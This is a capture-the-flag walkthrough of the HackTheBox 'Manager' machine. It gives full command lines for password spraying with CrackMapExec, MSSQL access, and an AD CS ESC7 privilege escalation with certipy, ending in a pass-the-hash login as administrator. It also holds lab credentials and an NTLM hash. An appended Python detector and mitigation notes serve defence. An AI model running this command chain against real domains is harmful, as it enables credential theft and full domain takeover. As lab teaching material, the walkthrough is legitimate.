HTB Manager: attacking the certificate authority in Active Directory

Greetings, dear readers, AP Security is here. Today we will go through the Windows machine Manager on HackTheBox.

Scanning and reconnaissance

To detect active services, let’s scan the machine using Nmap:

nmap -sC -sV -p- -T4 10.10.11.236

Let’s try to enumerate domain users with CrackMapExec using the --rid-brute option:

crackmapexec smb 10.10.11.236 -u anonymous -p ' ' --rid-brute

As a result, we obtain a list of users that can be used to develop the attack vector further. We save the list to a separate file, convert it to lower case and try each username as its own password against several services. CrackMapExec supports a large number of Microsoft protocols, so this is quick to do:

crackmapexec smb 10.10.11.236 -u users.txt -p users.txt
crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt

We find that for the user operator the password matches the username on the MSSQL service:

Point of entry

Having credentials for MSSQL, we can use the mssqlclient module from Impacket to connect to the database:

impacket-mssqlclient manager.htb/operator:operator@10.10.11.236 -windows-auth

So, we have successfully gained remote access to the database! Let’s try the following command to list the web root folder:

exec xp_dirtree 'C:\inetpub\wwwroot',1,1;

The xp_dirtree procedure takes three parameters:

  • directory – path to get a list of folders and files

  • depth – how many levels of subfolders should be scanned (default 0 – all subfolders)

  • file – in addition to the list of folders, return a list of files (default 0 – display only folders)

This command displays a list of folders and files in the specified path.

You can learn more about the MsSQL penetration testing methodology at HackTricks.

Hmm, an interesting archive named website-backup. Let’s download it using wget:

wget 10.10.11.236/website-backup-27-07-23-old.zip

Let’s unpack the archive; inside it we find the file .old-conf.xml. Let’s look through its contents for anything of interest to us:

Great, we have obtained the credentials of the user raven. Let’s try to connect to the machine using Evil-WinRM:

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

Here, in the directory C:\Users\Raven\Desktop, we find the file user.txt with the user flag.

Privilege escalation

Let’s look at information about the user using the command whoami /all

The user is a member of the group BUILTIN\Certificate Service. Let’s use certipy-ad to search for vulnerabilities in the certificate service:

certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236

Let’s look through the saved output file to find the vulnerabilities:

The certificate service is vulnerable to ESC7. Active Directory Certificate Services ships with the SubCA template, which is vulnerable to ESC1 by default, but only members of the Domain Admins group are allowed to enroll in it.

ESC7 is possible because failed requests are saved and can be resubmitted. A user with the Manage CA and Manage Certificates rights on a certificate authority can approve previously failed certificate requests and thereby issue a SubCA certificate for any user.

First of all, we synchronize our time with the domain controller:

sudo rdate -n 10.10.11.236

In order to resubmit failed requests, as indicated above, we need the Manage CA and Manage Certificates rights. We can grant ourselves these rights by adding our user as a new officer:

certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236

The SubCA template can be enabled on the certificate authority using the -enable-template parameter:

certipy ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -enable-template 'SubCA'

Next, we request a certificate based on the SubCA template. The request will be rejected, but we keep the private key and note the request ID:

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb

With the Manage CA and Manage Certificates rights, we can issue the failed request using the ca command and the -issue-request parameter:

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 18 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

Now that the request has been issued, we retrieve the certificate, which was issued for the user administrator:

certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 18

Having received the certificate, we authenticate with it and obtain the password hash of the administrator account:

certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236

With the password hash in hand, we connect to the machine using Impacket’s PsExec:

impacket-psexec manager.htb/administrator@manager.htb -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef -dc-ip 10.10.11.236
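From the defender’s side, the chain above leaves a recognisable trace in AD CS auditing: a request that was denied and later issued, carrying a SAN UPN for a different account, by a principal that had just been granted CA permissions. The following detector is an added example, not part of the original write-up; the events are constructed and only model a few fields of the Windows Security log events 4882 (CA permissions changed), 4888 (request denied) and 4887 (request issued), so the field layout is an assumption.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class CaEvent:
    """Simplified AD CS audit event; real events carry more fields (assumption)."""
    event_id: int                    # 4882, 4887 or 4888
    actor: str                       # account that submitted the request / made the change
    request_id: Optional[int] = None
    template: Optional[str] = None
    san_upn: Optional[str] = None    # UPN placed in the SAN, if any


# Constructed sample stream mirroring the walkthrough: officer rights granted,
# SubCA request for administrator's UPN denied, then the same request issued.
SAMPLE_EVENTS: List[CaEvent] = [
    CaEvent(4882, "raven"),
    CaEvent(4888, "raven", 18, "SubCA", "administrator@manager.htb"),
    CaEvent(4887, "raven", 18, "SubCA", "administrator@manager.htb"),
    CaEvent(4887, "raven", 19, "User", "raven@manager.htb"),   # benign enrolment
]


def detect_esc7(events: List[CaEvent]) -> List[Dict[str, object]]:
    """Return one alert per request that was denied and subsequently issued."""
    denied: Dict[int, CaEvent] = {}   # request_id -> the 4888 event
    granted: Set[str] = set()         # accounts that received CA permissions
    alerts: List[Dict[str, object]] = []
    for ev in events:
        actor = ev.actor.lower()
        if ev.event_id == 4882:
            granted.add(actor)
        elif ev.event_id == 4888 and ev.request_id is not None:
            denied[ev.request_id] = ev
        elif ev.event_id == 4887 and ev.request_id in denied:
            upn = (ev.san_upn or denied[ev.request_id].san_upn or "").lower()
            reasons = ["denied request later issued"]
            if upn and upn.split("@")[0] != actor:
                reasons.append("SAN UPN names a different account")
            if actor in granted:
                reasons.append("actor was granted CA permissions earlier")
            alerts.append({"request_id": ev.request_id, "actor": actor,
                           "template": ev.template, "san_upn": upn,
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_esc7(SAMPLE_EVENTS):
        print(alert)
```

Beyond detection, the exposure is removed by keeping Manage CA / Manage Certificates limited to administrative accounts and leaving SubCA disabled on the CA.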

The machine has been completed!
